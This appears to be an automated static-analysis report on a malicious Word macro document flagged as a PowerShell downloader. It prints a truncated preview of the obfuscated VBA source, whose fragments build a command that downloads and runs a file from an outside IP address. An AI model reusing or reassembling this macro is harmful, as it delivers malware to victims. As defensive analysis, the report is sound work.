Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f3c3bd8adecb5d6…

MALICIOUS

Office (OLE)

81.0 KB Created: 2017-11-11 00:00:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 5f7000da7ad9476909c198bd50a62f00 SHA-1: d9938f7979a8e9986a9cc0239d753dacc8d80d60 SHA-256: 1f3c3bd8adecb5d6d5b4e42a3c00e03f54698e6b4f0bc442fa1f2e0d29cdf217
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely a PowerShell command as suggested by the ClamAV detection name 'Doc.Downloader.Powload-7059209-0'. The macro's obfuscated nature and the use of Shell() strongly suggest it's designed to download and execute a secondary payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Powload-7059209-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-7059209-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38404 bytes
SHA-256: ce4ae9195eb5bb7964f022e921d05ea4154a5cb64735565751b4fa06c54a16c7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 36 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pnzahMHSO"
Function Roichtint()
kqFLuLtJ = Mid("7rWlumtFXqKWESaATCGi34N33", 15, 1) + GTVVwBJ + fNKIRYl
sqWLlCuZ = Mid("w9Jrpt9oaIjzQR7ArVMnb98c+98cre98c+98cak;'+'}ca98c+98ctch{writ98c+98ce-h98c+9'+'8cos98c'+'+98ct mUa_.E98c+98cxcep98c+98ct98c+98cion.Message;}}VVBlEZK6pH", 21, 121) + iKLYaZN + ipEjdDZ
jjviiX = Mid("0KZj69Wu0SQnQGrV4lakcW98'+'c+98cdb98c+98cHV98c+98c + mUak98c+98carapas + bH'+'bBT'+'+bBTV.e98c+98cx98c+98ce98c+98cbHV;98c+98c'+'bBT+bBTforeach(98c+98cm98c+98cUa98c+98clqKGKMSw9kz2n8", 21, 147) + NkAHjiz + wtwMZjS
mqAtHkIAj = Mid("9cibjII4sA25DniiSR9'+'8'+'c+98cebC98c+98client;mUan98c+98csabB'+'T+bBT98c+98cdasd98c+98c = ne98c+98cw-obje98c+98cc'+'t98c+98c r98c+98candom;98c+98cm98c+98cUab98c+98ccd = bBT+bBTbHVh98c+98ct98c+98ctp98cl76V1V", 19, 183) + EaUzJbU + jWXuwMk
fQADdzcirb = Mid("bPMIrp3Pjlwu7epLACe  ([CHAR]98+[CHAR]66+[CHAR]84),[CHAR]39)|INVoKe-ExPResS3TjGwaZY", 14, 61) + fsnCJoX + rZXqiLf
BwTXz = Mid("u0dSrZuCc0CKA3oUmq3rBm1wapqt6Invok98c+98ce-'+'I98c+98ctem(mUah98c+98'+'cua98c+98cs98c+98c);WNp", 30, 62) + wftRiri + HuCwHBb
QDMFWDWiz = Mid("MORJiS7AZB0a5),[CHAR]36 -cR2Dul1mzifKHXWmrAStwI", 13, 15) + PABFzdr + zQjnqbS
WkRWwWV = Mid("qq9as98c+98c = mUaenv:pub98c+98clic + 98c+98cbbBT+'+'bBTHVM98c+98joIsUa7DXzvBpGs", 4, 62) + SbovniC + uCEzQjL
vYSwbU = Mid("qmvX2SsmttK8jqXLSQ1Vsrbc i98c+98cbBT+bBT'+'n mU9'+'8c+98cab98c+98ccd)bBT'+'+bBT{tr9'+'8c+98cy{mUafr'+'ancbBT+bBT98c+9'+'8c.Do98c+98cwn98c+98clo'+'adFil'+'bBT+bBTe(mU98c+'+'98caabc.ToString(),'+' mUah'+'uas);98c+98cuOI5zwrSdkchk5hd", 23, 192) + ZuYIuwF + zuooaDt
tMKBr = Mid("n2wVpBTc+98crapas = 98c+98cm98c+98cUans98c+98cadasd.next(bBT+bBT198c+98c, 349bBT+bBT8c+98c'+'324598c+98c);mUahubBT+bBTMYfbvOYh9qBs8Ow8hpziR0S1Ert", 6, 113) + NEZsscJ + ZHpMjzB
YBoQLVnC = Mid("ACVzdIQSU8YpMYrS1k+98cka98bBT+bXpwCwzCV37kolzOXiYdlT", 19, 13) + uhkhOhk + OiLQlcc
tXbwBcdGUs = Mid("PioN4inGnbJTBLiDK18TniVzOLQrPSWkWaiDrmS", 2, 3) + kroBiNH + bwkTqVL
JIQLiYw = Mid("wrDmVM98c)-cREPlAce  98cMWd98c,[Cha'+'rbBT+bBT]92-R'+'ePLAce([Char]109+[bB'+'T+bBTCharbBT'+'+bBhB0jBMGBzRaIYcsnmE5ajAjQH", 7, 89) + SdQNuzT + ckuPDLX
cHOzr = Mid("PDH4XPcR99uQkcsbRcQa0MKNo(('& ( XFUpsHoME[4]+XFUpShoMe[30]+bBTxbBT)( (bBT&( xh6ShElLId['+'1]+xh6sHEllID[13]+98cX98c) (((98cmUafrabBT+bBT98c+98cnc =9'+'8c+98c n98bBT+'+'bBTc+98cew-object98c+98cbBT+bBT System.Net'+'98c+98c.WwV", 26, 197) + FnmwujH + CcaNJRm
JnUkQt = Mid("GRzXo22Diuj9CKG+98c://98c+98c89.298c+98c498c+98c8.169.1'+'398c+'+'98c6/98c+98cbi98c+98cgmac98c+98c.j98c+98'+'cpgbH9'+'8c+98cV98c'+'+98c.S98c+98cplit(98c+98cbHV,b98c+98cHV)98c+98c;m98c+bBT+bBT98cU98c+98ca98cuTuq0WdZJCZ72jrVJI6r8JG", 16, 191) + MrzatfH + cFRrJMs
AhwYwRT = Mid("wD8dT]85+[Char]97),[C'+'har]36  -cbBT+bBTREPlAce  98cbHbB'+'T+'+'bBTV98c,[Char]39))bBT).RePlACE(bBTxh6bBT,bBTXFUbBT).RePlACE(bBT98cbBT,[String][chAR]39) ) ') -REpLAce([CHAR]88+[CHAR]70+[CHAR]8drFTfM", 5, 188) + kXGrhQj + QjXGVcM
Roichtint = nzLluuPPa + QnSimfupD + Chr(34) + cHOzr + mqAtHkIAj + JnUkQt + YBoQLVnC + tMKBr + WkRWwWV + jjviiX + kqFLuLtJ + vYSwbU + BwTXz + sqWLlCuZ + JIQLiYw + AhwYwRT + QDMFWDWiz + fQADdzcirb + tXbwBcdGUs
End Function

Attribute VB_Name = "pPbYLZuMw"
Sub AutoOpen()
hcRjmQVrP
End Sub
Function QnSimfupD()
XjiiU = Mid("zD!!%hcRjmQVrP%rMmEwaf0Y", 3, 13) + FTJMYwP + TKhcjoc
REvJJ = Mid("KniRoichtGS52Kw8QqMcw831", 4, 6) + ctdEEHi + vzuJmdw
ntHDccj = Mid("NmK851HJw8vCwM8YczjNVw%=p^ouBzis", 21, 7) + NJAVphn + zbkVBhi
LVbUrVTbz = Mid("uNSspDNRomqLz%=cKh6D5v 0i0", 2, 14) + uaZLall + JRnQZAa
kFItXGRq = Mid("4s6KT0FzaYnA2iKuYCdonY0KVhel^l&&s6PYYHc", 26, 8) + qdAZRhJ + vqGwNBi
XJiAz = Mid("nJXpfBwG5DHNlFIet %YZHDwpTiQZiGSjK", 16, 7) + iuUEYaK + PzittQX
KJzDZjpsjp = Mid("M5si4nFKhLwIUuEQQj&&set %5Bjl", 17, 9) + tWwOdLM + bIdHztN
QDLDmkuNnE = Mid("5iset %HOAaDplpzCvPB5WYM58m", 3,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.